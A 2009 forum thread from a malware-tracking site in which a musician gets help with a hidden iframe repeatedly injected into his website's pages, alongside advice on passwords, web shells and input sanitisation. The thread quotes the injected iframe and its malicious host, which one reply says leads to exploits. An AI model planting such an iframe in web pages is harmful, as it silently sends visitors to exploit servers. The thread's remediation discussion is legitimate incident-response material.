Malware Domain List

Malware Related => Compromised Servers => Topic started by: kris on June 13, 2009, 04:16:59 pm

Title: It instals it's self in my index.htm file on my website
Post by: kris on June 13, 2009, 04:16:59 pm
Hi guys I'm new here just joined today.I hope to find help for the fallowin problem -the fallowing link- it  starts with a "<iframe " tag and then goes ----src="http://nyfilmlife.cn:8080/index.php" width=185 height=191 style="visibility: hidden">" -----and then it ends up with </iframe> " tag . It instals it's self to my index.htm file on my website and "eats up" 1/3 some times 1/2 of my text there.What can I do to make it go away.I erased it few times but it keeps comming .I wrote to my host but still no responce.Thanks for the help in advance.Kris

MysteryFCM: URL disabled
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 13, 2009, 04:36:38 pm
Chances are the code putting it there is in some of your other files.

First and foremost, please replace ALL files on your server with clean copies, and change ALL passwords for your siite (including FTP).
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 13, 2009, 04:40:55 pm
Thanks,I'll start with that- changing my password.Why didn't it cross my mind before?I was looking around and all other files seem to be ok.Thanks again I'll go do it right now.Chhers.Kris
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 13, 2009, 04:50:16 pm
Can you post your sites URL?

If your site uses a database, this will also need checked.

I'd also recommend scouring your site for any files that look suspicious, or have a date on or since, the problem began.
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 13, 2009, 04:56:32 pm
www.krissviconte.com is my modest musician website.I noticed it a few weeks ago.It might have been there before as well .I don't think it has data base.
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 13, 2009, 04:57:50 pm
it always comes to www.krissviconte.com/index.htm and to the identical one krissviconte.com/main.htm ---thanks for your time and effort once again.
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 13, 2009, 05:40:54 pm
Has the site already been cleaned? (not seeing any malicious codes there)

I checked both your .css and .js file, and neither are carrying anything malicious either.
Title: Re: It instals it's self in my index.htm file on my website
Post by: CM_MWR on June 14, 2009, 03:47:14 am
It also appears cleaned from here as well, most curious what they did other than change passwords?
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 14, 2009, 06:37:43 am
Hi ,
I just erased the frame line and changed my password -nothing else.Let's see for how long it's going to last.Anyway google has registered my website as malicious and everytime someone does a search for it (or my name) it shows the link and a warning that it's dangerous to theyr computer.!!!how about that.It will take probably months before they "release me"...thanks again to all.
Kriss
Title: Re: It instals it's self in my index.htm file on my website
Post by: SysAdMini on June 14, 2009, 09:28:51 am
You can request a review via Google Webmaster Tools.

http://googlewebmastercentral.blogspot.com/2007/08/malware-reviews-via-webmaster-tools.html
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 14, 2009, 03:07:34 pm
Yes I did request but now this "thing" is there again if you go to www.krissviconte.com/index.htm and www.krissviconte.com/main.htm it's there on the last line before the last 2 tags and it has eaten up the last few lines of my text.I wonder will that change if I change the host server?It happened before on that server that -they say - it was attacked by hackers and my website content was erased completely- just dissapeared. I don't want to write this code here because i don't know if I'll transfer it to you that way. it starts with  <iframe src="http    ....etc  and finnishes with </iframe>
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 14, 2009, 03:14:17 pm
It also appears cleaned from here as well, most curious what they did other than change passwords?

Hi Steven now this "thing" is again there -if you have time you can see and tell me how to "kill " it www.krissviconte.com/index.htm and also on www.krissviconte.com/main.htm
will that come again if I change the  host server and clean everything before that.From the server they're writing me this :"Hi,

Nobody can access your account to make changes to your site without the correct password. If you suspect someone has gained access to your password, you may need to log in at http://www.budgethostingweb.com and change it.

We're sorry we can't find this link or text on the pages you mention. This doesn't happen when we view the pages so it is probably something on your local computer. You may need to check your antivirus software to see if there is a problem there."

and also this " Hi,

Unfortunately it is possible for spyware on your local computer to steal passwords or manipulate files. We're sorry we don't know if this is the cause or source of your problem, however there have been no unauthorized accesses to our system or your account. We run ironclad security to prevent unauthorized access.

If there is a problem with your site or pages, it has been caused by an upload from a source outside our system, perhaps your local computer.

We're sorry we can't help with problems outside our system. If Firefox is blocking your page, you may need to follow the instructions at:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US
&site=http://www.krissviconte.com/"
I'm really confused what to do.I depend on my site so much for my work.
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 14, 2009, 04:27:03 pm
Now I found one file in my base directory that shouldn't be there ( i think) it's called Lware.class and deleted it I also deleted the "<iframe " thing from both pages - let's see if this was the problem...
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 14, 2009, 05:02:24 pm
I've checked your site again using several different user agents, on the off chance it was trying to hide itself based on that, and I'm afraid I still cannot see anything malicious there.

Have you changed your FTP password already? (prior to it's appearing again)

Did you check ALL of the files on your sites FTP server, to ensure all files are those you recognize?

If you answered yes to the above, chances are you've got a keylogger on your machine that keeps sending the attacker the new password and/or the attacker has placed a shell on your site, that you've missed, that will allow them to re-attack your site (these are typically .pl, .asp or .php files).
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 14, 2009, 05:32:43 pm
It should also be noted, the infection that was present on your site, leads to exploits (PDF etc). As such, if you are doing any of this from the machine you used to load the site - STOP!. Use a clean machine (i.e. one that has not accessed your site since these issues began). Passwords and files etc, should be changed from there.
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 15, 2009, 05:38:47 am
Hi again,probably you didn't find nothing because I was in a hurry to delete that Lware.class file and then erase the <iframe line from both places and since then (last night 14.6.(about 22:00 ) nothing new has appeared.I also scanned my computer with a few different antivirus programs and cleaned everything that was found even suspicious.Speaking of spyware - could you recomend me some good reliable and not too expensive ( or why not a free one -even I doubt that:-) for a privat person ( I mean I do not own a company with many computers).I find so many on the net but you probably are aware( from experience) of some really efective ones .
I thank you very much for your time and effort!You're of great help to me and obviously many other people.God bless you!!!
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 15, 2009, 12:53:26 pm
The 2 best antimalware programs are;

a-Squared
www.emsisoft.com

Malwarebytes AntiMalware
www.malwarebytes.org

For additional information, please see;

http://mysteryfcm.co.uk/?mode=Articles&date=12-08-2008
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 15, 2009, 01:11:14 pm
Thanks again !
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 15, 2009, 06:32:06 pm
No problem :)
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 17, 2009, 10:30:28 am
Hi again,
it might be POSSIBLE  that all this comes from my machine.I scanned it with the Malwarebyte's program and it showed me 96 infected files in the HKU registry- I click the program to remove them but next time they are there again and I can't access my regedit.exe  - I go to start->run->regedit and nothing -then I did change the settings enable disable as I read on the net for to make it work and still nothing.Looks  like my machine is very ill.
I just wonder if there was nothing malicious on my site how did google and firefox marked it as attacking site - now whenever someone searches for my name it shows a line next to my URL -this site is  dangerous for your computer.
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 17, 2009, 03:55:21 pm
Google etc, would have picked it up when the malicious code was there (i.e. prior to your removing it).

I'd strongly advise you stop by the Malwarebytes forums as they'll be able to help you clean out the infections.
Title: Re: It instals it's self in my index.htm file on my website
Post by: Serg on June 17, 2009, 09:02:27 pm
nice. when u will find a malware please post it's md5 here. I want to find admin page for that... 
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 18, 2009, 07:52:37 am
Hi again the frame code that appears on my "index.htm" and may "main.htm" pages is here  it  starts with a "<iframe " tag and then goes ----src=(Quotes")http : // nyfilmlife.cn:8080/index.php"  width=185 height=191 style="visibility: hidden">" -----and then it ends up with </iframe> " tag --I have posted it also before on my previous postings.I cleaned my site and Google and Firefox are not blocking anymore my site and they don't show the warning when someone searches for kriss viconte on Google.
But only ( not even)2 days was my site clean !!! I changed my password and cleaned all the <frame codes from my telefon with my wlan wifi connection.Last night I found that frame again and I haven't accessed my account at least 36hours since it was clean.Before I fixed it -the last time -there were also some *.class files missing from my java anfy applet and I have never erased any of them.Now I have renamed my index.htm and main.htm files because I don't want google to report my site as malicious again and will look for a new host.I think that host is not stron enough to protect me from someone getting in my account and modifyin my files. ???  am I right. ???
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 18, 2009, 06:25:03 pm
When you changed your password last time, did you do so from a non-compromised machine?

You MUST ensure;

1. Passwords are changed from a non-infected machine
2. No shells were placed on the server by the attacker, to let them back into the site even if they can't get the current FTP password
3. Any files on your server that allow user input (e.g. via forms), are using proper sanitization to prevent injection and the like, for example, if you currently use;

Code: [Select]
$email = $_GET['mail']
Where GET is either GET for querystrings, or POST for post method strings

Is Changed to;

Code: [Select]
$email = $_GET['mail']; $email = addslashes(htmlentities($email, ENT_QUOTES));
And ensure use of mysql_real_escape_string if you're using MySQL.

/edit

Just a note, the best way of ensuring #2 is to delete all files currently on the server, and uploading a clean copy from a backup (assuming you have one), and again, uploading them from a clean computer (otherwise all they'll need to do is wait for you to connect to your sites FTP again, and sniff the password again).

You should also ensure ALL passwords are alpha numeric with special characters, and do NOT use full words (e.g. "m$98'$"kjh£$KJ" instead of "mydoggy8ate0my2breakfast"). Password crackers will crack passwords with full words in them, in a matter of seconds/minutes usually.
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 18, 2009, 06:31:17 pm
Please also ensure you pop over to either of the following, to ensure your machine is properly cleaned up;

http://malwarebytes.org/forums

or;

http://malwarecrypt.com/forumdisplay.php?f=4
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 19, 2009, 11:24:14 am
Hi Stven if I give you my username and password would you go to my account -base directory and look at all the files there-when you have time.I don't really know what is a "shell " and where to look for it -is it a separete file or is it "implementes" in some of thje other files and sort of hidden.I have looked at all my files there and exept for the "Lwarere.class " I removed all the others are my own.
I changed my pass word last time from my phone internet conection -it's supposed to be clean-I hope - and didn't visit my account delibaretly just to see if it's gona happen again.I'm about to change to a new server to a new host but I'm afraid it will happen there too -that's why I'm so eager to find out how this exactly happens and how to prevent it.As it looks like it's not so  much my server's fold.But still when I did my last backup with filezilla I had to use my oldest password ,which means my ftp pass doesn't change automaticaly when I change my account pass word.On the other hand the host doesn't give me a option to change my ftp pass separately.They say connect to the ftp server using your account pass word,but if I connect with filezilla it works only with my old password.
One other thing gives me a BIG QUESTION MARK??? -who would want to do this to me -I 2wonder who wants to scrue up my website?!?I have no such enemies... ???
And last but not less important - Steven,I can't thank you enough for what you're doing for me.Thanks for all your time and good heart.Kriss

P/S and now I remember that I have this function of windows rememberring my passwords ,enabled - but of course not for the last ones of my website host account -should i disable this function as well -completely?
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 19, 2009, 01:47:55 pm
Hi Stven if I give you my username and password would you go to my account -base directory and look at all the files there-when you have time.I don't really know what is a "shell " and where to look for it -is it a separete file or is it "implementes" in some of thje other files and sort of hidden.I have looked at all my files there and exept for the "Lwarere.class " I removed all the others are my own.

I'll be more than happy to do so, yes, but please don't post them here. Instead either PM the account details (I'll need the FTP hostname, username and password) to me, or send them to me via e-mail (mdl_users @ it-mate.co.uk)

But still when I did my last backup with filezilla I had to use my oldest password ,which means my ftp pass doesn't change automaticaly when I change my account pass word.On the other hand the host doesn't give me a option to change my ftp pass separately.They say connect to the ftp server using your account pass word,but if I connect with filezilla it works only with my old password.

If changing your account password did not change your FTP password aswell, then that will be how they got back in, which means, until the FTP password itself is changed, they'll be able to keep doing this (your host should be providing a facility to change the FTP password). If your host is telling you to connect to FTP using the account password, but you are only able to do such using the old password, you MUST inform them of this as soon as possible as they are the only ones that have the relevant facilities to look into and resolve this for you.

One other thing gives me a BIG QUESTION MARK??? -who would want to do this to me -I 2wonder who wants to scrue up my website?!?I have no such enemies... ???

The good thing, and not much comfort, is that this is not personal - they aren't targetting you directly or personally. They do this specificaly to make more money for themselves, that is their ultimate goal, they don't care who they step on to do such.

And last but not less important - Steven,I can't thank you enough for what you're doing for me.Thanks for all your time and good heart.Kriss

It's a pleasure :)

P/S and now I remember that I have this function of windows rememberring my passwords ,enabled - but of course not for the last ones of my website host account -should i disable this function as well -completely?

I'd very strongly recommend disabling that, yes.